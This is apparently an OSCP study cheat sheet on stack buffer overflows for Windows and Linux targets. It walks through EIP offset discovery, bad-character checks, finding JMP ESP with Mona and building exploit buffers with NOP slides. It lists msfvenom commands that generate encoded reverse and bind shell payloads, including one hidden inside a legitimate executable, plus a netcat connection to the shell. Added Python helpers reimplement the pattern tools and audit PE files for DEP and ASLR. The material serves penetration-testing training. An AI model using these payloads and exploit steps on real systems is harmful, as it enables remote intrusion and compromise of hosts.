forked from sd-geek/OSCP
08 - Buffer Overflow
---------------- Buffer Overflow ----------------
/usr/share/metasploit-framework/tools/pattern_create.rb -l [LENGTH]
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q [ADDRESS]
DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
MSFvenom
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
---------------- Windows Buffer Overflows ----------------
Controlling EIP
locate pattern_create
# pattern_create.rb -l 2700
locate pattern_offset
# pattern_offset.rb -q 39694438
Verify the exact offset at which EIP is overwritten - [*] Exact match at offset 2606
# buffer = "A" * 2606 + "B" * 4 + "C" * 90
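How the two tools above arrive at "offset 2606" is worth understanding rather than trusting: the pattern is a non-repeating sequence of uppercase/lowercase/digit triplets, and the value read out of EIP is those four bytes in little-endian order. The following Python is an added example (not from the original cheat sheet or from Metasploit) that reimplements the pattern generation and the offset lookup, plus the little-endian packing used later to place a return address in the buffer; the 20280-byte limit is the size of the default character sets before the pattern repeats.

```python
import string
import struct

# Character sets used by the Metasploit-style cyclic pattern (uppercase, lowercase, digit triplets)
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Return the cyclic pattern 'Aa0Aa1Aa2...' truncated to `length` characters."""
    if length > MAX_PATTERN:
        raise ValueError("length %d exceeds the %d-byte non-repeating pattern" % (length, MAX_PATTERN))
    chunks = []
    total = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def le_bytes(address):
    """Pack a 32-bit address little-endian, the byte order the x86 CPU reads it in.

    le_bytes(0x5f4a358f) gives b'\\x8f\\x35\\x4a\\x5f', the reversed form the
    cheat sheet writes into the buffer by hand."""
    return struct.pack("<I", address)


def pattern_offset(value, length=MAX_PATTERN):
    """Locate a register value inside the pattern, like pattern_offset.rb -q.

    `value` is either the 8-hex-digit register contents (e.g. '39694438' as
    read from EIP, hence little-endian) or a literal 4-character fragment.
    Returns the zero-based offset, or -1 if the value does not occur.
    """
    pattern = pattern_create(length)
    v = value.lower()
    if v.startswith("0x"):
        v = v[2:]
    if len(v) == 8 and all(c in string.hexdigits for c in v):
        # The register holds four pattern bytes little-endian, so 0x39694438 is
        # the byte sequence 38 44 69 39, i.e. the fragment "8Di9".
        fragment = le_bytes(int(v, 16)).decode("latin-1")
        idx = pattern.find(fragment)
        if idx != -1:
            return idx
    return pattern.find(value)


if __name__ == "__main__":
    # Reproduces the cheat sheet's numbers: EIP = 0x39694438 after a 2700-byte pattern.
    print(pattern_create(2700)[:30])
    print(pattern_offset("39694438"))   # 2606
    print(le_bytes(0x5f4a358f))         # b'\x8f\x35\x4a\x5f'
```

Because the lookup only works if the register really holds four consecutive pattern bytes, a -1 result usually means the crash was not a clean overwrite (for example a partial overwrite or a pointer that was itself dereferenced), which is a useful sanity check before trusting any offset.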
Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
Use Mona to determine a module that is unprotected
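What Mona reports at this step (whether a loaded module opted into DEP and ASLR) is recorded in the PE optional header's DllCharacteristics field, and the same information is what a defender checks when auditing which binaries on a host still lack these mitigations. The following Python is an added example (not from the original cheat sheet or from Mona) that parses that field directly from a file; the `build_sample_pe` function fabricates a headers-only PE so the audit can be demonstrated without a real binary. SafeSEH is deliberately not covered because it lives in the Load Config directory rather than in this field.

```python
import struct

# DllCharacteristics flags from the PE optional header (values as in winnt.h)
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # image may be relocated (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # image is DEP-compatible
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000       # Control Flow Guard

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def read_dll_characteristics(data):
    """Walk MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> optional header
    and return the 16-bit DllCharacteristics field."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                      # the COFF file header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 in both PE32 and PE32+ optional headers
    if size_of_optional < 72:
        raise ValueError("optional header too short")
    return struct.unpack_from("<H", data, opt + 70)[0]


def audit_mitigations(data):
    """Report which compile-time mitigations a PE image opts into.
    A False here is the 'unprotected module' Mona would flag."""
    flags = read_dll_characteristics(data)
    return {
        "DEP": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "ASLR": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "HighEntropyVA": bool(flags & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "CFG": bool(flags & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def build_sample_pe(dll_characteristics, pe32plus=False):
    """Constructed, headers-only PE (not a loadable image) so the audit can be
    exercised offline; the machine type and sizes are the usual values."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header follows the DOS header
    opt_size = 0xF0 if pe32plus else 0xE0
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def audit_file(path):
    with open(path, "rb") as fh:
        return audit_mitigations(fh.read())


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, audit_file(p))
```

The flags describe only what the image asks for: DEP can still be enforced system-wide by policy, and a module that sets DYNAMIC_BASE is randomized only if the loader can actually relocate it, so the audit is a first pass that should be confirmed against the running process.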
If DEP is present, find a memory location with read and execute permissions that holds a JMP ESP
Otherwise without DEP, we can stick our
Use NASM to determine the HEX code for a JMP ESP instruction
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
Run Mona in the Immunity Debugger log window to find the FFE4 (JMP ESP) opcode
# !mona find -s "\xff\xe4" -m slmfc.dll
Found at 0x5f4a358f - reverse the byte order for little-endian format when writing it into the buffer
# buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
MSFVenom to create payload
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Final Payload with NOP slide
# buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
Create a PE Reverse Shell
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
Create a PE reverse shell and embed it into an existing executable
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Create a PE Reverse HTTPS shell
# msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
---------------- Linux Buffer Overflows ----------------
Run Evan's Debugger (edb) against the app
# edb --run /usr/games/crossfire/bin/crossfire
ESP register points toward the end of our CBuffer
First-stage stub, assembled with nasm_shell.rb:
add eax,12
jmp eax
83C00C  add eax,byte +0xc
FFE0    jmp eax
Check for "Bad Characters" by process of elimination - run multiple times over 0x00 - 0xFF
Find JMP ESP address
"\x97\x45\x13\x08" # Found at Address 08134597
crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
Connect to the shell with netcat:
# nc -v $ip 4444